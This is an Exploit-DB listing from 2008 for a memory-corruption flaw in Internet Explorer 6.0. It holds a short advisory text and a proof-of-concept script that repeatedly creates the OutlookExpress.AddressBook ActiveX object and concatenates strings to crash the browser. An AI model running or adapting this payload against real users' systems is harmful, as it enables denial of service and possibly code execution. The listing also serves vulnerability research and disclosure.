Microsoft Internet Explorer 6.0 New ActiveX Object String Concatenation Memory Corruption Vulnerability

2008-07-14T00:00:00
ID EDB-ID:32049
Type exploitdb
Reporter 0x000000
Modified 2008-07-14T00:00:00

Description

Microsoft Internet Explorer 6.0 New ActiveX Object String Concatenation Memory Corruption Vulnerability. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/30219/info

Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability.

Remote attackers can exploit this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.

<script>

for(i=0;i<33;i++){

   try{ 

   foo = new ActiveXObject("OutlookExpress.AddressBook").concat('3'+'3'+'3'); 

   }catch(e){}

}

</script>